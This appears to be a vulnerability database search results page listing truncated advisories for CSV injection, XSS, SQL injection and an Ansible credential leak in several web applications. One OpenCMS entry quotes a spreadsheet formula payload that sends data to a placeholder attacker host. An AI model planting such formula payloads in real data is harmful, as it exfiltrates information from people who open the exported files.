Lucene search
K

228 matches found

Packet Storm
Packet Storm
added 2020/11/10 12:0 a.m.254 views

Anuko Time Tracker 1.19.23.5325 CSV Injection

Exploit Title: Anuko Time Tracker 1.19.23.5325 - CSV/Formula Injection Date: 2020-10-17 Exploit Author: Mufaddal Masalawala Vendor Homepage: https://www.anuko.com/ Software Link: https://www.anuko.com/time-tracker/index.htm Version: 1.19.23.5325 Tested on: Kali Linux 2020.3 CVE: CVE-2020-15255...

6.5CVSS0.2AI score0.03462EPSS
Exploits3
Exploit DB
Exploit DB
added 2020/10/19 12:0 a.m.257 views

Hostel Management System 2.1 - Cross Site Scripting (Multiple Fields)

Exploit Title: PHPGurukul hostel-management-system 2.1 allows XSS via Guardian Name, Guardian Relation, Guardian Contact no, Address, City Google Dork: N/A Date: 2020-10-08 Exploit Author: Kokn3t Vendor Homepage: https://phpgurukul.com Software Link: https://phpgurukul.com/hostel-management-syste...

5.4CVSS5.6AI score0.03185EPSS
Exploits3
RedhatCVE
RedhatCVE
added 2020/04/09 9:46 a.m.40 views

CVE-2018-16837

The User module in Ansible leaks any data which is passed on as a parameter to ssh-keygen. This could lead to undesirable situations such as passphrase credentials being passed as a parameter for the ssh-keygen executable, showing those credentials in clear text form for every user which have...

7.8CVSS3AI score0.00354EPSS
Exploits0References2
NVD
NVD
added 2020/02/11 7:15 p.m.17 views

CVE-2014-3827

Multiple cross-site scripting XSS vulnerabilities in the MyBB aka MyBulletinBoard before 1.8.4 allow remote authenticated users to inject arbitrary web script or HTML via the title parameter in the 1 edit or 2 add action in the user-users module or the 3 finduser action or the name parameter in a...

5.4CVSS5.2AI score0.00628EPSS
Exploits0References2
Prion
Prion
added 2020/02/11 7:15 p.m.16 views

Cross site scripting

Multiple cross-site scripting XSS vulnerabilities in the MyBB aka MyBulletinBoard before 1.8.4 allow remote authenticated users to inject arbitrary web script or HTML via the title parameter in the 1 edit or 2 add action in the user-users module or the 3 finduser action or the name parameter in a...

3.5CVSS5.7AI score0.00628EPSS
Exploits0References2Affected Software1
CVE
CVE
added 2020/02/11 6:23 p.m.42 views

CVE-2014-3827

CVE-2014-3827 affects MyBB versions before 1.8.4. The vulnerability is a set of stored/reflected XSS flaws that allow a remote authenticated user to inject arbitrary script/HTML via the title parameter in the user-users module (edit/add), the finduser action, or the name/parameter in the edit act...

5.4CVSS5.1AI score0.00628EPSS
Exploits0References2Affected Software1
Packet Storm
Packet Storm
added 2019/05/10 12:0 a.m.41 views

OpenCMS 10.5.4 CSV Injection

Description: OpenCMS v10.5.4 and before is vulnerable to CSV injection in New User module for parameter First Name and Last Name Impacted URL is http://yourwebserverip/opencms/system/workplace/admin/accounts/usernew.jsp Payload used is '=HYPERLINK"http://attackerip:port/GiveMeSomeData","IAmSafe"'...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2019/05/10 12:0 a.m.29 views

OpenCMS 10.5.4 Cross Site Scripting

Description: OpenCMS v10.5.4 and before is vulnerable to cross site scripting in New User module for parameter First Name and Last Name Impacted URL is http://yourwebserverip/opencms/system/workplace/admin/accounts/usernew.jsp Payload used in PoC is...

0.1AI score
Exploits0
NVD
NVD
added 2019/05/08 4:29 p.m.22 views

CVE-2019-11819

Alkacon OpenCMS v10.5.4 and before is affected by CSV aka Excel Macro Injection in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp via the First Name or Last Name...

7.8CVSS7.8AI score0.01001EPSS
Exploits1References2
NVD
NVD
added 2019/05/08 4:29 p.m.29 views

CVE-2019-11818

Alkacon OpenCMS v10.5.4 and before is affected by stored cross site scripting XSS in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp. This allows an attacker to insert arbitrary JavaScript as user input First Name or Last Name, which will be executed whenever the affected...

6.1CVSS6AI score0.00765EPSS
Exploits1References2
Prion
Prion
added 2019/05/08 4:29 p.m.14 views

Code injection

Alkacon OpenCMS v10.5.4 and before is affected by CSV aka Excel Macro Injection in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp via the First Name or Last Name...

6.8CVSS7.8AI score0.01001EPSS
Exploits1References2Affected Software1
OSV
OSV
added 2019/05/08 4:29 p.m.21 views

CVE-2019-11819

Alkacon OpenCMS v10.5.4 and before is affected by CSV aka Excel Macro Injection in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp via the First Name or Last Name...

7.8CVSS7.5AI score
Exploits0References2
OSV
OSV
added 2019/05/08 4:29 p.m.16 views

CVE-2019-11818

Alkacon OpenCMS v10.5.4 and before is affected by stored cross site scripting XSS in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp. This allows an attacker to insert arbitrary JavaScript as user input First Name or Last Name, which will be executed whenever the affected...

6.1CVSS5.8AI score
Exploits0References2
Cvelist
Cvelist
added 2019/05/08 3:35 p.m.30 views

CVE-2019-11819

Alkacon OpenCMS v10.5.4 and before is affected by CSV aka Excel Macro Injection in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp via the First Name or Last Name...

7.8AI score0.01001EPSS
Exploits1References2
Cvelist
Cvelist
added 2019/05/08 3:34 p.m.34 views

CVE-2019-11818

Alkacon OpenCMS v10.5.4 and before is affected by stored cross site scripting XSS in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp. This allows an attacker to insert arbitrary JavaScript as user input First Name or Last Name, which will be executed whenever the affected...

6AI score0.00765EPSS
Exploits1References2
Mageia
Mageia
added 2019/03/21 4:36 p.m.45 views

Updated ansible packages fix security vulnerability

The user module leaked parameters passed to ssh-keygen to the process environment CVE-2018-16837. The fetch module was susceptible to path traversal CVE-2019-3828...

4.2CVSS2.9AI score0.00522EPSS
Exploits0References2
OSV
OSV
added 2019/03/21 4:36 p.m.11 views

MGASA-2019-0114 Updated ansible packages fix security vulnerability

The user module leaked parameters passed to ssh-keygen to the process environment CVE-2018-16837. The fetch module was susceptible to path traversal CVE-2019-3828...

4.2CVSS5.7AI score0.00522EPSS
Exploits0References3
0day.today
0day.today
added 2019/03/19 12:0 a.m.42 views

eNdonesia Portal 8.7 - Multiple Vulnerabilities

Exploit for php platform in category web applications =========================================================================================== Exploit Title: eNdonesia Portal 'banners.php' SQL Inj. Dork: N/A Date: 19-03-2019 Exploit Author: Mehmet EMIROGLU Vendor Homepage:...

0.3AI score
Exploits0
RedHat Linux
RedHat Linux
added 2019/03/18 12:56 p.m.5 views

Ansible: Information leak in "user" module

The User module in Ansible leaks any data which is passed on as a parameter to ssh-keygen. This could lead to undesirable situations such as passphrase credentials being passed as a parameter for the ssh-keygen executable, showing those credentials in clear text form for every user which have...

7.8CVSS7.2AI score0.00354EPSS
Exploits0References5
RedHat Linux
RedHat Linux
added 2019/03/14 1:34 p.m.5 views

Ansible: Information leak in "user" module

The User module in Ansible leaks any data which is passed on as a parameter to ssh-keygen. This could lead to undesirable situations such as passphrase credentials being passed as a parameter for the ssh-keygen executable, showing those credentials in clear text form for every user which have...

7.8CVSS7.2AI score0.00354EPSS
Exploits0References5
Rows per page
Query Builder